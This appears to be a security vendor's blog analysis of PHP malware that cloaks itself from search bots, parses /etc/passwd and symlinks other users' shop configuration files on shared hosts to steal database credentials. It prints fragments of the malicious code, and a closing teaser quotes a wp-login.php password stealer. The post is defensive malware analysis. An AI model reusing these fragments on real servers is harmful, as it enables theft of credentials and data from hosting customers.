Multiple UNIX users symbolic link injector

Labs Note

Recently we found a very interesting malware that injects symbolic links in each and every Linux/UNIX home folder. Once the website is infected, it uses the following code to avoid detection from search engine agents and can be executed only by the attackers:

if (!empty($_SERVER['HTTP_USER_AGENT'])) {    $bot = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");    if (preg_match('/' . implode('|', $bot) . '/i', $_SERVER['HTTP_USER_AGENT'])) {       header('HTTP/1.0 404 Not Found');       exit;    }}

The malicious code also performs other checks, such as verifying if the OS is Windows (as it may not work on that OS due to filesystem differences) and if the symlink function is enabled on the PHP engine:

if ($_POST["m"] && !$_POST["passwd"] == "") {              $check = @ini_get("disable_functions");       if (eregi("symlink", $check)) {           die("<font color=13B8E6>Symlink is Disbled</font>");       }

If the following conditions are met:

  • User Agent is different than search engines;
  • OS is Linux/UNIX based;
  • PHP engine has the symlink function enabled;

The malware injects another code into .htaccess file in order to change your DirectoryIndex to Sux.html, which usually redirects to a defacement page.

Moreover, the attacker also has the capability of sending different $_POST requests in order to try finding the location of the /etc/passwd file.

$etc_passwd = $_POST["passwd"];$etc_passwd = explode("", $etc_passwd);foreach ($etc_passwd as $passwd) {    $pawd = explode(":", $passwd);    $user = $pawd[0];

This technique is used because if the infected server is sitting in a shared environment and they have write permissions to those other directories, attackers can inject multiple symlinks in different users and get as many database files and sensitive data as they can:

@symlink('/home/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');@symlink('/home/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');@symlink('/home/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');

If you don’t use symlinks, our recommendation would be disabling them altogether – this way the script is ineffective. Also check the /home directory on your hosting for different directories that are not known to you, plus for files and folders that are not part of your website.

If you want to be sure that your website is not infected, or if you need help cleaning it up, let us know.

You May Also Like

Simple WP login stealer

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
Read the Post